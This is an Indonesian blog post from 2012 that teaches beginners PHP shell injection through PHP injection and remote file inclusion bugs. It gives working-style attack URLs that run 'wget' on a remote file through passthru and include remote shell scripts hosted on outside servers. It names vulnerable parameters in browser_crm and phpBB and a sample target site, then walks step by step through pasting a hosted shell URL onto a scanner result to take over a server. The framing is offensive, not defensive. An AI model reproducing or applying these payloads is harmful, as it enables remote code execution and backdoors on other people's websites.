Saturday, March 24, 2012

Tutorial PHP Shell Injection



Oke dech kaka2, adek2, agan2, ibuk2, om2, semuanya yang dah pada master selamat menonton aja, dan buat yg masih newbie alias yang bener-bener cupu kayak saya mari kita mulai acaranya. Akan saya jelaskan dari dasar biar gak ada lagi pertanyaan seperti “Apakah itu?”, “Kenapa Bisa Begitu?”, ”Gak ngerti gue, jelasin lagi dunk maksudnya!?”.


PHP SHELL INJECTION.

1. PHP SHELL INJECTION-
Landasan Teori
 PHP Shell Injection ( Injeksi PHP ) itu afaan om?PHP Shell Injection adalah sebuah tindakan untuk melakukan eksploitasi terhadap celah keamanan sebuah website dengan cara menginjeksi Shell hasil pengkodean bahasa PHP terhadap file yang terdapat pada website tersebut yang memiliki kelemahan ataupun kesalahan pemrograman/pengkodean. Tapi kalau orang kita biasa menyebutnya Nginjek Shell hehe… Yang saya maksud dengan PHP Shell Injection di sini adalah berbeda hal dengan PHP Injection. PHP Shell Injection yang akan saya bahas adalah tindak lanjut atau tahap eksploitasi selanjutnya dengan memanfaatkan bug PHP Injection ataupun Remote File Inclusion (RFI), yaitu pengeksploitasian sebuah target dengan media PHP Shell. Perhatikan perbedaannya :
PHP Injection, memasukan perintah-perintah shell langsung dengan menambahkan perintah PHP pada URL:
www.target.com/[path]/page.php?action=exit.passthru($_GET[cok]);exit&cok=wget http://thecode.co.cc/kambe/r00t
 Yang bertulisan tebal itu perintah PHP-nya sedangkan yang bertulisan miring adalah perintah shellnya.
PHP Shell Injection-nya :
www.target.com/[path]/page.php?action=exit.include($_GET[cok]);exit&cok= http://thecode.co.cc/kambe/shell.txt?
Remote File Inclusion, memasukan file yang berisi script PHP dari luar ke dalam target dengan memanfaatkan kesalahan statemen pengkodean PHP pada file di dalam target yang tidak terfilter dengan baik, misalnya bug ini:
require_once($bcrm_pub_root . “/public_prepend.inc.php”)
PHP Shell Injection-nya :www.target.com/browser_crm/pub/clients.php?bcrm_pub_root=http://thecode.co.cc/kambe/shell.txt?
- Saatnya Beraksi!
Setelah anda berhasil mendapatkan target berupa situs yang mempunyai kelemahan terhadap serangan RFI (Remote File Inclusion) dari proses scanning yang dilakukan oleh bot scan kamu sebelumnya, misalnya saja bot scan kamu menampilkan output seperti di bawah ini :http://intruder.gmork.cz/forum//includes/usercp_sendpasswd.php?phpbb_root_path[user]=[evil code]
 Nah dari url yang dikeluarkan oleh bot scan tersebut, kamu ambil/copy sampai ke tanda ’=’ (sama dengan) seperti pada gambar di atas (tulisan evil code-nya dibuang), lalu tambahkan di belakangnya (tanpa spasi) script PHP Shell yang mau dipakai untuk injeksi (PHP Shell Injector) dan diakhiri dengan tanda tanya ( ? ).
Lah mana PHP Shell Injector-nya???
Bagi donk!!!
Hare gene gak punya PHP Shell Injector….?
heheheOke kalo yang belum punya coba aja cari di google tau di forum..
 Kalau udah dapat semuanya, misalnya seperti ini :- Target tadi:
http://intruder.gmork.cz/forum//includes/usercp_sendpasswd.php?phpbb_root_path[user]=[evil code]
 - PHP Shell Injector:
http://h1.ripway.com/newbe/kambe.txt
 Sekarang gabungkan keduanya jadi seperti ini :http://intruder.gmork.cz/forum//includes/usercp_sendpasswd.php?phpbb_root_path[user]= http://h1.ripway.com/newbe/kambe.txt?
 Jangan lupa tanda tanya dibelakangnya harus ditambahkan. Setelah itu paste-kan hasil di atas ke browser lalu jalankan. Kalo browser menampilkan hasil seperti di bawah ini atau mungkin mirip (Php Injektor memiliki tampilan berbeda-beda), maka selamat buat kamu, kamu telah melakukan yang namanya PHP SHELL INJECTION!

===========================BY: CardyMen===========================

0 komentar:

Post a Comment